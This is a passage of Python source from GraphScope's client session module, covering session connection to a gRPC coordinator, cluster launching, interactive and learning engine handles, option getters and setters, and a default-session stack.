"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
else:
return dag_node
def run(self, fetches, debug=False):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
                If fetch is not an instance of :class:`Operation`, or
                the fetch has already been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
fetch_handler = _FetchHandler(self.dag, fetches)
try:
response = self._grpc_client.run(fetch_handler.targets)
except FatalError:
self.close()
raise
return fetch_handler.wrapper_results(response)
def _connect(self):
if self._config_params["addr"] is not None:
            # try to connect to an existing coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
            # launch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError("Session initialize failed.")
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(self._coordinator_endpoint)
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return self._wrapper(
GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
that will be evaluated by :method:`sess.run` in eager mode.
Note that this method will be executed implicitly in eager mode when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
If you want to create a new instance under the same graph by different params, you should close
the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery in eager mode.
>>> interactive_query = sess.gremlin(g)
>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`graphscope.framework.graph.GraphDAGNode`):
The graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError:
- :code:`graph` is not a property graph.
- :code:`graph` is unloaded in eager mode.
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
"""
# Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
# self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
if (
self.eager()
and graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
else:
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(
interactive_query.error_msg
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
# cache the instance of interactive query in eager mode
interactive_query = InteractiveQuery()
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
try:
enable_gaia = self._config_params["enable_gaia"]
_wrapper = self._wrapper(
InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
)
except Exception as e:
if self.eager():
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
if self.eager():
interactive_query = _wrapper
graph._attach_interactive_instance(interactive_query)
return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
:class:`graphscope.learning.GraphDAGNode`:
                An instance of learning graph that could be fed to the learning engine, evaluated in eager mode.
"""
if (
self.eager()
and graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if sys.platform != "linux" and sys.platform != "linux2":
raise RuntimeError(
"The learning engine currently supports Linux only, doesn't support %s"
% sys.platform
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
_wrapper = self._wrapper(
LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
)
if self.eager():
self._learning_instance_dict[graph.vineyard_id] = _wrapper
graph._attach_learning_instance(_wrapper)
return _wrapper
def nx(self):
if not self.eager():
raise RuntimeError(
"Networkx module need session to be eager mode. "
"The session is lazy mode."
)
if self._nx:
return self._nx
import importlib.util
spec = importlib.util.find_spec("graphscope.nx")
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
setattr(graph, "_session", self)
setattr(digraph, "_session", self)
setattr(mod, "Graph", graph)
setattr(mod, "DiGraph", digraph)
self._nx = mod
return self._nx
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError("No such option {} exists.".format(k))
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
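# Hedged usage sketch (not part of the original file): options are plain
# attributes on GSConfig, so set_option()/get_option() are symmetric:
#
#     set_option(show_log=True, timeout_seconds=1200)
#     assert get_option("timeout_seconds") == 1200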
def get_option(key):
"""Get the value of specified option.
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_gie_graph_manager_image
- k8s_zookeeper_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
else:
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
    This function provides a means of registering a session to handle
    code that needs default-session calls.
    Use the :code:`with` keyword to specify that code invocations within
    the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
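# Hedged usage sketch (not part of the original file): default_session() is a
# context manager, so a session can be installed as the default only for the
# duration of a block (the cluster_type argument below is illustrative):
#
#     sess = graphscope.session(cluster_type="hosts")
#     with default_session(sess):
#         g = graphscope.g()        # dispatched to `sess` implicitly
#     sess.close()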
def get_default_session():
"""Returns the default session for the current context.
Raises:
        RuntimeError: If no default session exists.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session {} not exists.".format(handle))
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
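# Hedged usage sketch (not part of the original file): the module-level g()
# above resolves the default session, so after registering a session with
# as_default() a graph can be built without naming the session object:
#
#     sess = session(cluster_type="hosts")   # illustrative arguments
#     sess.as_default()
#     graph = g(directed=False)              # runs against `sess`
#     sess.close()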
|